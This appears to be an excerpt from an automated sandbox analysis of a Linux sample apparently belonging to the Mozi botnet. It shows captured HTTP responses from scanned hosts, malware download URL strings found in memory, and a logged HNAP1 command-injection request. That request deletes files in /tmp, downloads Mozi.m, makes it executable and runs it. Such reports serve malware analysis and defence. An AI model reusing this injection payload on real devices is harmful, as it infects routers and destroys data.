Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Nov 2021 14:46:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 207Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 16 Nov 2021 14:47:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.3 (Debian)Content-Length: 280Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 32 30 31 2e 34 39 2e 34 31 2e 37 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 201.49.41.72 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.22 (Debian)X-Powered-By: PHP/5.4.45-0+deb7u14Vary: Accept-EncodingContent-Length: 2957Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/htmlX-Pad: avoid browser bugData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 52 65 71 75 65 73 74 65 64 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 68 74 6d 6c 20 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 36 25 3b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 7d 0a 0a 09 62 6f 64 79 20 7b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 3b 0a 09 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0a 09 09 77 69 64 74 68 3a 39 30 30 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 7d 0a 09 61 3a 6c 69 6e 6b 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 76 69 73 69 74 65 64 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 68 6f 76 65 72 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 34 35 37 44 43 39 3b 0a 09 7d 20 20 20 20 20 20 0a 09 69 6d 67 20 7b 0a 09 09 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 09 7d 0a 09 23 48 65 61 64 65 72 7b 0a 09 09 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 09 09 68 65 69 67 68 74 3a 31 30 34 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 42 36 44 37 46 46 3b 0a 09 09 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 2e 6a 70 67 22 29 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 62
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.8Date: Tue, 16 Nov 2021 14:47:41 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.15.8</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/htmlContent-Length: 1198Connection: closeVary: Accept-EncodingData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8f 82 e6 95 b0 ef bc 8c e5 b7 b2 e8 a2 ab e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 ae be e7 bd ae e6 8b a6 e6 88 aa ef bc 81 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 8f af e8 83 bd e5 8e 9f e5 9b a0 ef bc 9a 3c 2f 70 3e 0a 09 09 09 3c 6f 6c 3e 0a 09 09 09 09 3c 6c 69 3e e6 82 a8 e6 8f 90 e4 ba a4 e7 9a 84 e5 86 85 e5 ae b9 e5 8c 85 e5 90 ab e5 8d b1 e9 99 a9 e7 9a 84 e6 94 bb e5 87 bb e8 af b7 e6 b1 82 3c 2f 6c 69 3e 0a 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 42467Connection: closeX-Request-Id: ef485288-6a8c-448a-a0fb-a9632f449634X-Runtime: 0.001219Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 63 2d 53 74 69 63 6b 79 46 6f 6f 74 65 72 20 62 2d 62 72 6f 77 73 65 72 2d 63 68 72 6f 6d 65 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 e6 9d b1 e4 ba ac e3 83 ac e3 82 b8 e3 83 87 e3 83 b3 e3 82 b9 e3 83 9e e3 83 bc e3 82 b1 e3 83 83 e3 83 88 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 82 92 e3 80 8c e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 80 8d e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 82 88 e3 81 86 ef bc 81 20 e3 81 93 e3 82 8c e3 81 8b e3 82 89 e3 81 ae e6 99 82 e4 bb a3 e3 80 81 e8 b3 87 e7 94 a3 e5 bd a2 e6 88 90 e3 82 84 e9 81 8b e7 94 a8 e3 81 af e3 81 be e3 81 99 e3 81 be e3 81 99 e9 87 8d e8 a6 81 e3 81 a7 e3 81 99 e3 80 82 e3 81 a7 e3 81 af e3 80 81 e4 bd 8f e3 81 be e3 81 84 e3 81 ae e8 b2 bb e7 94 a8 e3 82 84 e4 be a1 e5 80 a4 e3 82 92 e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 81 af e3 81 a9 e3 81 86 e3 81 a7 e3 81 97 e3 82 87 e3 81 86 e3 81 8b e3 80 82 e3 83 9e e3 83 b3 e3 82 b7 e3 83 a7 e3 83 b3 e3 82 92 e8 b2 b7 e3 81 86 e3 81 9e e3 80 81 e5 a3 b2 e3 82 8b e3 81 9e e3 81 a8 e5 8a 9b e3 82 80 e5 89 8d e3 81 ab e3 80 81 e9 95 b7 e3 81 84 e4 ba ba e7 94 9f e3 81 ae e3 80 8c e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 80 8d e3 82 92 e5 b0 91 e3 81 97 e6 84 8f e8 ad 98 e3 81 99 e3 82 8b e3 81 93 e3 81 a8 e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 81 be e3 81 9b e3 82 93 e3 81 8b ef bc 9f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 0a 20 20 20 20 2a 3a 3a 62 65 66 6f 72 65 2c 0a 20 20 20 20 2a 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 35 3b 0a 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 16 Nov 2021 14:48:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closex-amzn-RequestId: e7b030a0-f51e-4aba-ba1c-3db988bfe780Data Raw: 55 73 65 72 20 69 73 20 6e 6f 74 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 74 68 69 73 20 61 63 74 69 6f 6e Data Ascii: User is not authorized to perform this action

URLs found in memory or binary data

Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m;
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://%s:%d/bin.sh
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://127.0.0.1
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://127.0.0.1sendcmd
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://HTTP/1.1
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 